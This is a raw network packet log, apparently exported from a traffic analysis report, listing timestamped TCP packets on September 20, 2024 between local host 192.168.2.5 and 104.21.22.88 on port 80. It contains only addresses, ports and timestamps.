                                                              Sep 20, 2024 12:00:09.138447046 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:09.138462067 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:09.138477087 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:09.138480902 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:09.138509989 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:09.138511896 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:09.138540030 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:09.138555050 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:09.138570070 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:09.138576031 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:09.138587952 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:09.138603926 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:09.138605118 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:09.138622046 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:09.138637066 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:09.138644934 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:09.138653040 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:09.138669014 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:09.138675928 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:09.138699055 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:09.138703108 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:09.138715982 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:09.138731003 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:09.138746023 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:09.138748884 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:09.138763905 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:09.138778925 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:09.138780117 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:09.138796091 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:09.138811111 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:09.138811111 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:09.138828993 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:09.138845921 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:09.138854027 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:09.138870955 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:09.138885021 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:09.138890982 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:09.138900995 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:09.138916969 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:09.138922930 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:09.138935089 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:09.138950109 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:09.138957977 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:09.138966084 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:09.138982058 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:09.138986111 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:09.139007092 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:09.139017105 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:09.139023066 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:09.139039040 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:09.139053106 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:09.139060974 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:09.139069080 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:09.139084101 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:09.139086962 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:09.139098883 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:09.139116049 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:09.139118910 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:09.139132977 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:09.139148951 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:09.139151096 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:09.139178038 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:09.139183998 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:09.139194012 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:09.139209986 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:09.139225006 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:09.139238119 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:09.139241934 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:09.139257908 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:09.139257908 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:09.139275074 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:09.139288902 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:09.139293909 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:09.139307976 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:09.139322996 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:09.139328957 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:09.139339924 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:09.139355898 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:09.139359951 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:09.139372110 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:09.139398098 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:09.139401913 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:09.139415026 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:09.139430046 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:09.139435053 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:09.139448881 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:09.139461994 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:09.139471054 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:09.139477015 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:09.139492989 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:09.139497042 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:09.139508963 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:09.139524937 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:09.139537096 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:09.139538050 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:09.139554024 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:09.139568090 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:09.139569044 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:09.139585018 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:09.139590979 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:09.139601946 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:09.139616966 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:09.144525051 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:09.144557953 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:09.144572973 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:09.144575119 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:09.144614935 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:09.144624949 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:09.144629955 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:09.144648075 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:09.144661903 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:09.144663095 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:09.144695997 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:09.144736052 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:09.144752026 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:09.144767046 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:09.144817114 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:09.144859076 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:09.144875050 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:09.144900084 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:09.144903898 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:09.144917011 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:09.144933939 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:09.144937992 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:09.144948959 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:09.144963980 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:09.144972086 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:09.144989014 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:09.145057917 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:09.145073891 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:09.145088911 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:09.145104885 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:09.145107985 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:09.145122051 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:09.145138979 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:09.145143986 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:09.145155907 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:09.145174026 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:09.145225048 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:09.145241022 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:09.145255089 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:09.145262957 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:09.145272017 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:09.145282984 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:09.145287991 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:09.145313025 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:09.145324945 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:09.145328999 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:09.145344973 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:09.145360947 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:09.145365000 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:09.145378113 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:09.145394087 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:09.145402908 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:09.145411015 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:09.145425081 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:09.145436049 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:09.145453930 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:09.145471096 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:09.145474911 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:09.145487070 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:09.145503998 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:09.145507097 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:09.145519972 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:09.145535946 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:09.145543098 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:09.145551920 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:09.145567894 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:09.145575047 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:09.145584106 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:09.145597935 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:09.145607948 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:09.145622015 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:09.145634890 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:09.145651102 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:09.145664930 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:09.145674944 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:09.145679951 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:09.145695925 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:09.145697117 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:09.145711899 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:09.145726919 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:09.145730972 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:09.145745039 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:09.145761013 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:09.145776987 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:09.145793915 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:09.145807981 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:09.145817041 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:09.145826101 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:09.145840883 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:09.145848989 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:09.145883083 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:09.145899057 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:09.145901918 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:09.145915985 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:09.145931005 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:09.145932913 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:09.145955086 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:09.145967007 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:09.145972967 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:09.145988941 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:09.146004915 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:09.146013975 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:09.146030903 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:09.146044970 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:09.146049976 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:09.146061897 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:09.146078110 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:09.146083117 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:09.146095037 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:09.146111012 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:09.146114111 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:09.146127939 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:09.146143913 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:09.146143913 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:09.146159887 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:09.146174908 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:09.146182060 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:09.146200895 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:09.146209002 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:09.146217108 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:09.146234035 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:09.146248102 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:09.146260023 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:09.146264076 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:09.146280050 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:09.146282911 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:09.146296978 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:09.146312952 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:09.146312952 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:09.146332026 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:09.146348953 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:09.146358013 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:09.146373987 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:09.146388054 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:09.146390915 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:09.146404982 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:09.146420956 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:09.146428108 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:09.146436930 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:09.146451950 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:09.146457911 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:09.146467924 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:09.146482944 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:09.146486044 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:09.146498919 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:09.146522999 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:09.146523952 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:09.146550894 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:09.146557093 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:09.146574020 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:09.146590948 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:09.146605968 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:09.146610975 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:09.146622896 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:09.146637917 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:09.146639109 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:09.146656990 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:09.146672010 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:09.146672010 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:09.146691084 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:09.146704912 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:09.146714926 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:09.146730900 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:09.146745920 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:09.146745920 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:09.146761894 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:09.146776915 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:09.146776915 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:09.146794081 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:09.146809101 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:09.146810055 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:09.146826982 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:09.146841049 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:09.146842003 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:09.146888018 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:09.146903992 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:09.146919966 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:09.146934986 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:09.146950006 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:09.146954060 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:09.146981001 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:09.146985054 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:09.146997929 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:09.147013903 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:09.147028923 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:09.147031069 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:09.147044897 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:09.147059917 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:09.147059917 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:09.147075891 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:09.147090912 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:09.147092104 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:09.147109032 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:09.147124052 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:09.147126913 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:09.147150993 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:09.147155046 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:09.147167921 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:09.147183895 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:09.147200108 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:09.147205114 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:09.147217035 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:09.147233963 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:09.147242069 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:09.147257090 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:09.147273064 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:09.147275925 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:09.147291899 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:09.147308111 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:09.147314072 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:09.147325039 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:09.147340059 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:09.147344112 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:09.147356033 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:09.147372007 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:09.147373915 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:09.147403955 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:09.147408009 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:09.147420883 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:09.147437096 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:09.147453070 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:09.147456884 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:09.147476912 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:09.147485971 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:09.147494078 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:09.147509098 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:09.147524118 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:09.147532940 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:09.147541046 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:09.147556067 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:09.147556067 CEST4972480192.168.2.5104.21.22.88
